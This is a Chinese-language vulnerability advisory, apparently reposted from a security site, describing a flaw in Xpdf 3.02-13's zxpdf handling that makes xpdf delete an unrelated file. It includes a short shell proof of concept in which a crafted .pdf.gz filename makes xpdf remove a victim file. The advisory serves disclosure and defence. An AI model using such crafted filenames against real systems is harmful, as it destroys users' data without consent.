Xpdf “zxpdf”安全限制绕过漏洞

发布日期:2011-08-04
更新日期:2011-08-04

受影响系统:
Xpdf Xpdf 3.02-13
不受影响系统:
Xpdf Xpdf 3.02-19
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 49007

Xpdf是便携文档格式(PDF)文件的开放源码查看器。

Xpdf在zxpdf的实现上存在安全限制绕过漏洞,远程攻击者可利用此漏洞绕过安全限制,执行未授权操作。

通过特制的.pdf.gz文件名称(通过Web浏览器发送到浏览器),只要文件名是单字符,xpdf可误删除不相关的文档。

<*来源:Chung-chieh Shan
 
  链接:?bug=635849.
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

$ touch y # The unrelated victim file
$ gzip -c &lt;/dev/null &gt;'" y ".pdf.gz' # Create a .pdf.gz file
$ xpdf '" y ".pdf.gz' # View it using xpdf
Error: May not be a PDF file (continuing anyway)
Error: PDF file is damaged - attempting to reconstruct xref table...
Error: Couldn't find trailer dictionary
Error: Couldn't read xref table
rm: cannot remove `/tmp/': Is a directory
$ ls -l y # The victim file is gone!
ls: cannot access y: No such file or directory

建议:
--------------------------------------------------------------------------------
厂商补丁:

Xpdf
----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/wwxgpy.html